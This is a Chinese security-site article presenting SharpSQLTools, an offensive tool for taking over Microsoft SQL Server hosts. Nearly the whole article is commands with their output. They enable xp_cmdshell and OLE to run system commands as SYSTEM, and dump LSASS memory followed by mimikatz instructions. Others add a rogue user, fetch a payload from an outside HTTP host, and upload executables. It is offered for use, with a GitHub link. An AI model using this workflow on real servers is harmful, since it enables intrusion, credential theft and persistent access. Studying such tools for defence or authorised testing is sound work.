长亭百川云 - 文章详情

长亭百川云

技术讨论漏洞库IP 威胁情报在线工具

SharpSQLTools-上传下载文件,xp_cmdshell与sp_oacreate双回显和clr加载程序集

零队

78

2024-07-13

原文链接

简介

和RcoIl一起写的小工具,可上传下载文件,xp_cmdshell与sp_oacreate双回显和clr加载程序集执行相应操作。功能参考mssqlproxy,由于目前C#还不知如何获取SQL连接的socket,该项目中的mssqlproxy功能目前尚未实现。另外,Clr不适用于一些与线程进程相关的操作。

编译环境为net 4.0

吹一波RcoIl ,关注RcoIl跟着大佬学C#!!!

http://github.com/rcoIl

Usage

>SharpSQLTools.exe   _____ _                      _____  ____  _   _______          _  / ____| |                    / ____|/ __ \| | |__   __|        | | | (___ | |__   __ _ _ __ _ __| (___ | |  | | |    | | ___   ___ | |___  \___ \| '_ \ / _` | '__| '_ \\___ \| |  | | |    | |/ _ \ / _ \| / __|  ____) | | | | (_| | |  | |_) |___) | |__| | |____| | (_) | (_) | \__ \ |_____/|_| |_|\__,_|_|  | .__/_____/ \___\_\______|_|\___/ \___/|_|___/                         | |                         |_|                                                    by Rcoil & UknowUsage:SharpSQLTools target username password                   - interactive consoleSharpSQLTools target username password module command    - non-interactive consoleModule:enable_xp_cmdshell         - you know what it meansdisable_xp_cmdshell        - you know what it meansxp_cmdshell {cmd}          - executes cmd using xp_cmdshellsp_oacreate {cmd}          - executes cmd using sp_oacreateenable_ole                 - you know what it meansdisable_ole                - you know what it meansupload {local} {remote}    - upload a local file to a remote path (OLE required)download {remote} {local}  - download a remote file to a local pathenable_clr                 - you know what it meansdisable_clr                - you know what it meansinstall_clr                - create assembly and procedureuninstall_clr              - drop clrclr_dumplsass              - dumplsass by clrclr_adduser {user} {pass}  - add user by clrclr_download {url} {path}  - download file from url by clrexit                       - terminates the server process (and this session)

功能介绍

支持交互模式与非交互模式,交互模式直接跟目标,用户名和密码即可。非交互模式直接跟模块与命令。

SharpSQLTools target username password                   - interactive consoleSharpSQLTools target username password module command    - non-interactive console

xp_cmdshell执行命令

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX xp_cmdshell whoami[*] Database connection is successful!nt authority\system

sp_oacreate执行命令

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX sp_oacreate whoami[*] Database connection is successful![+] c:\windows\system32\cmd.exe /c whoami > C:\Users\Public\Downloads\1611131759069.txt[+] Reading C:\Users\Public\Downloads\1611131759069.txtnt authority\system[+] Deleting C:\Users\Public\Downloads\1611131759069.txt

clr_dumplsass

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_dumplsass[*] Database connection is successful![*] Dumping lsass (488) to C:\Windows\Temp\debug488.out[+] Dump successful![*] Compressing C:\Windows\Temp\debug488.out to C:\Windows\Temp\debug488.bin gzip file[X] Output file 'C:\Windows\Temp\debug488.bin' already exists, removing[*] Deleting C:\Windows\Temp\debug488.out[+] Dumping completed. Rename file to "debug488.gz" to decompress.[*] Operating System : Windows Server 2008 R2 Standard[*] Architecture     : AMD64[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch

clr_adduser

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_adduser test1234 1qaz@WSX[*] Database connection is successful![*] Adding User success[*] Adding Group Member success

clr_download

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_download "http://192.168.28.185:8001/clac.bin" "c:\Users\Public\Downloads\test.bin"[*] Database connection is successful![*] Download success

upload

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX upload C:\Users\Pentest\Desktop\test\usc.exe c:\Users\Public\Downloads\11.exe[*] Database connection is successful![*] Uploading 'C:\Users\Pentest\Desktop\test\usc.exe' to 'c:\Users\Public\Downloads\11.exe'...[+] 7-1 Upload completed[+] 7-2 Upload completed[+] 7-3 Upload completed[+] 7-4 Upload completed[+] 7-5 Upload completed[+] 7-6 Upload completed[+] 7-7 Upload completed[+] copy /b c:\Users\Public\Downloads\11.exe_x.config_txt c:\Users\Public\Downloads\11.exe[+] del c:\Users\Public\Downloads\*.config_txt[*] 'C:\Users\Pentest\Desktop\test\usc.exe' Upload completed

download

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX download c:\Users\Public\Downloads\t.txt C:\Users\Pentest\Desktop\test\t.txt[*] Database connection is successful![*] Downloading 'c:\Users\Public\Downloads\t.txt' to 'C:\Users\Pentest\Desktop\test\t.txt'...[*] 'c:\Users\Public\Downloads\t.txt' Download completed

Github

https://github.com/uknowsec/SharpSQLTools

References

https://github.com/blackarrowsec/mssqlproxy

相关推荐
热门产品
雷池 WAF 社区版
IP 威胁情报
网站安全监测
百川漏扫服务
云堡垒机
百川云
技术文档
开发工具
漏洞库
网安百科
安全社区
CT STACK 安全社区
雷池社区版
XRAY 扫描工具
长亭科技
长亭科技官网
万众合作伙伴商城
长亭 BBS 论坛
友情链接
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服
Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2